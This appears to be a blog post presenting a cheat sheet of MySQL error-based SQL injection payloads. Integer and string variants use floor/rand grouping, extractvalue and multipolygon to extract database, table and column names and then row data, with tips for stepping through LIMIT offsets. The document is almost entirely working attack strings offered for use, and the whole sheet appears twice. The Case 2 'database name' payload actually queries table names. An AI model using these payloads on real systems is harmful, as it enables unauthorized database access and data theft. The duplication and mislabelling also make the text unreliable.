Pranaam to All _/\_
This blog post is about exploiting error based SQL Injection (only for MySQL database).
Normal SQL Injection:
Case 1 - Integer Based
Database Name extraction
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Table name extraction
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
To extract next table name, change value in limit clause from 0,1 to 1,1 and so on
Column name extraction
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
To extract next column name, change value in limit clause from 0,1 to 1,1 and so on
Data extraction
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
In my case column name is "user" and table name is "data", replace it appropriate column name and table name so that you can extract data.
Case 1 - String Based
Database Name extraction
-> ' and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2
Table name extraction
-> ' and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2
To extract next table name, change value in limit clause from 0,1 to 1,1 and so on
Column name extraction
-> ' and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2
To extract next column name, change value in limit clause from 0,1 to 1,1 and so on
Data extraction
-> ' and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2
In my case column name is "user" and table name is "data", replace it appropriate column name and table name so that you can extract data.
Case 2 - String Based (using extractvalue function)
Database Name extraction
-> ' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e )) and 1<'2
Table name extraction
-> ' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e )) and 1<'2
Column name extraction
-> ' and extractvalue(6678,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() LIMIT 0,1),0x7e )) and 1<'2
Data extraction
-> ' and extractvalue(6678,concat(0x7e,(select id from data LIMIT 0,1),0x7e )) and 1<'2
In my case column name is "id" and table name is "data", replace it appropriate column name and table name so that you can extract data.
Case 3 - String Based (using multipolygon function)
Database Name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,database(),0x7e))a)b))) and 1<'2
Table name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=database() limit 0,1)a)b))) and 1<'2
Column name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema=database() limit 0,1)a)b))) and 1<'2
Data extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,id,0x7e,user,0x7e) from data limit 0,1)a)b))) and 1<'2
This blog post is about exploiting error based SQL Injection (only for MySQL database).
Normal SQL Injection:
Case 1 - Integer Based
Database Name extraction
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
Table name extraction
-> and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
To extract next table name, change value in limit clause from 0,1 to 1,1 and so on
Column name extraction
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
To extract next column name, change value in limit clause from 0,1 to 1,1 and so on
Data extraction
-> and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)
In my case column name is "user" and table name is "data", replace it appropriate column name and table name so that you can extract data.
Case 1 - String Based
Database Name extraction
-> ' and (select 1 FROM(select count(*),concat((select (select concat(0x7e7e,database(),0x7e7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2
Table name extraction
-> ' and (select 1 FROM(select count(*),concat((select (select concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2
To extract next table name, change value in limit clause from 0,1 to 1,1 and so on
Column name extraction
-> ' and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select column_name from information_schema.columns where table_schema=database() limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2
To extract next column name, change value in limit clause from 0,1 to 1,1 and so on
Data extraction
-> ' and(select 1 FROM(select count(*),concat((select (select concat(0x7e,(select user from data limit 1,1),0x7e))),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a) and 1<'2
In my case column name is "user" and table name is "data", replace it appropriate column name and table name so that you can extract data.
Case 2 - String Based (using extractvalue function)
Database Name extraction
-> ' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e )) and 1<'2
-> ' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 1,1),0x7e )) and 1<'2
Column name extraction
-> ' and extractvalue(6678,concat(0x7e,(select column_name from information_schema.columns where table_schema=database() LIMIT 0,1),0x7e )) and 1<'2
Data extraction
-> ' and extractvalue(6678,concat(0x7e,(select id from data LIMIT 0,1),0x7e )) and 1<'2
In my case column name is "id" and table name is "data", replace it appropriate column name and table name so that you can extract data.
Case 3 - String Based (using multipolygon function)
Database Name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,database(),0x7e))a)b))) and 1<'2
Table name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,table_name,0x7e) from information_schema.tables where table_schema=database() limit 0,1)a)b))) and 1<'2
Column name extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,column_name,0x7e) from information_schema.columns where table_schema=database() limit 0,1)a)b))) and 1<'2
Data extraction
-> ' and (select multipolygon((select 1 from (select * from (select concat(0x7e,id,0x7e,user,0x7e) from data limit 0,1)a)b))) and 1<'2
0 comments